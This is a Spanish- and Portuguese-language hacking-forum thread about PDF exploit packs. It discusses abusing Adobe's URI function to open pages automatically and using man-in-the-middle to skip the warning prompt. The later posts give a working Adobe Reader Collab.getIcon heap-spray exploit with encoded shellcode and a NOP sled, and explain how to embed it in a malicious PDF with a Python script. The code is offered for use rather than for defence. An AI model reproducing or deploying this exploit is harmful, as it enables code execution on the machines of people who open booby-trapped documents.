Hola,
Alguien lo tiene y podria pasarlo ?? y de paso comentar alguna experiencia con el...
e ai mano beleza...seja bem-vindoSacerdote escribió:Hola,
Alguien lo tiene y podria pasarlo ?? y de paso comentar alguna experiencia con el...
seria isto aqui que vc procura????
[Enlace externo eliminado para invitados] ... F-Exploits
Valeu mano

todos los exploit de este tipo usan apis indocumentadas de adobe, son apis para manejar cosas relacionadas con el js
Código: Seleccionar todo
{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING **}
{******************************************************************************}
{** **}
{** The prototypes, declarations and information in this file has been **}
{** compiled from various sources as well as through reverse engineering **}
{** techniques. We make no guarantee as to the correctness of the contents. **}
{** Caution is recommended, USE AT YOUR OWN RISK. **}
{** **}
{******************************************************************************}
Pues el Xploit Pack no lo tengo, pero entiendo por encima como usar algunos fallos en PDF, por ejemplo:
PoC - Funcion URI dentro de un PDF. (Para lanzar webs embebidas automaticamente)
[Enlace externo eliminado para invitados]
No mostrare mucho sobre como hacerlo, si lo quieren analizar lo pueden hacer desde un editor hexadecimal, se ven claramente las secciones del codigo que interesan para editar.

Este PDF en su codigo interno trata de abrir una pagina PHP, si se le permite conectar a la pagina genera un dialogo de descarga solicitando descargar un plugin. Esta confirmación de seguridad la hace acrobat para sitios externos, pero si se aplica el mismo concepto en sitios de confianza (man-in-the-middle por ej) se puede lanzar cualquier página sin confirmación.

En el caso del Xploit Pack, la pagina que se carga es el lanzador, como si se estableciera en un PDF usando URI la direccion de cualquier otro exploiter o 0day. Aunque bueno, hay muchas otras funciones no documentadas tambien pero en la ultima version de adobe acrobat se introdujo el cuadro de advertencia de conexión a paginas externas (Pero no se parcheo al usuario). . Lectura recomendada:
[Enlace externo eliminado para invitados]
PoC - Funcion URI dentro de un PDF. (Para lanzar webs embebidas automaticamente)
[Enlace externo eliminado para invitados]
No mostrare mucho sobre como hacerlo, si lo quieren analizar lo pueden hacer desde un editor hexadecimal, se ven claramente las secciones del codigo que interesan para editar.

Este PDF en su codigo interno trata de abrir una pagina PHP, si se le permite conectar a la pagina genera un dialogo de descarga solicitando descargar un plugin. Esta confirmación de seguridad la hace acrobat para sitios externos, pero si se aplica el mismo concepto en sitios de confianza (man-in-the-middle por ej) se puede lanzar cualquier página sin confirmación.

En el caso del Xploit Pack, la pagina que se carga es el lanzador, como si se estableciera en un PDF usando URI la direccion de cualquier otro exploiter o 0day. Aunque bueno, hay muchas otras funciones no documentadas tambien pero en la ultima version de adobe acrobat se introdujo el cuadro de advertencia de conexión a paginas externas (Pero no se parcheo al usuario). . Lectura recomendada:
[Enlace externo eliminado para invitados]

"No es llevarse el mayor pedazo de la torta, sino hacer la torta más grande para todos"
bueno revivo este post.... haber si alguien me ayuda con un tuto o algo sobre scriting en pdf
ed:
Now download this python script and unzip it in python folder:
http://www.didierstevens.com/files/sof ... 0_1_1.zip
goto python directory through CMD and type:
Example:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
ed:
Código: Seleccionar todo
function spary(){
var shellcode = unescape("%uc931%ue983%ud9a2%ud9ee%u2474%u5bf4%u7381%u5b13%ueec2%u83f8%ufceb%uf4e2%ud2b0%ub2b4%u0b68%u4188%uc367%ucc6e%u5b51%u020c%uc7b0%u1306%u3da4%u8811%u5b17%u6177%u3f98%u51d6%u5bc2%uea77%u5782%u11fc%uf6de%u21fc%ud0ca%ueaaf%u67b1%u15fc%u23dc%u9274%u2549%u6257%ud039%u7539%ub6f1%u3621%ud093%u6248%ud039%u0b85%u02cc%uc784%u53b6%u3e2e%u9c41%u2473%ub220%u3e2e%ud09c%ueaba%u7f84%ua274%uba13%ua074%u92f1%uea11%ud0ca%u7d31%u98c1%u80b6%u58c0%ueab6%u58c2%ueab4%ud038%ue280%u5504%ub1fc%u5fa8%u892e%u5b92%u6177%u9d41%u337a%ua494%u9d20%ud098%u0baf%u02c3%u5c9f%u5bc2%ue277%u4804%u2721%u6542%u14f7%udb38%ue141%ud89c%u419b%u8749%u411d%ua491%u8d20%u5f05%u3d74%u75a3%ua612%u5886%u1973%u5ba7%u5277%u0b02%u3227%u0b94%u3688%ud03e%u31ab%ua491%u9120%ua492%u9520%u9bf1%ue4db%u2e02%u308e%u0d90%u9e24%u0110%uca2e%ub520%ua144%ub301%u9e51%ua43d%u0430%u0bb6%u0e05%u1aa1%u0513%u3eb0%u1204%u1cc2%u1512%u2291%u1504%u36a7%u0833%u3eb0%u1514%u29ad%u200e%u0cc2%u0f1e%u2387%u0212%u1ec2%u080f%u0fb6%u131f%u3aa7%u6113%u348e%u0516%u328e%u1315%u29a3%u200e%u2ec2%u0d05%u34af%u6119%u0997%u253b%u2cad%u0d19%u3aad%u3513%u1dad%u0d1e%u1aa7%u9077%ub62f%uc29e%ued74%u8d85%ua336%u8b9c%uac34%ud687%uab28%u9d9a%uae28%u9c8b%ua175%u9581%ua074%u9dc0%ua723%uf86e");
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length<acl) nopblock+=nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
Collab.getIcon(buffer+'_N.bundle');
}
spary();
http://www.didierstevens.com/files/sof ... 0_1_1.zip
goto python directory through CMD and type:
Código: Seleccionar todo
c:\python>make-pdf-javascript.py -f javascript_file pdf_file
Código: Seleccionar todo
c:\python>make-pdf-javascript.py -f a.txt exp.pdf
[Enlace externo eliminado para invitados]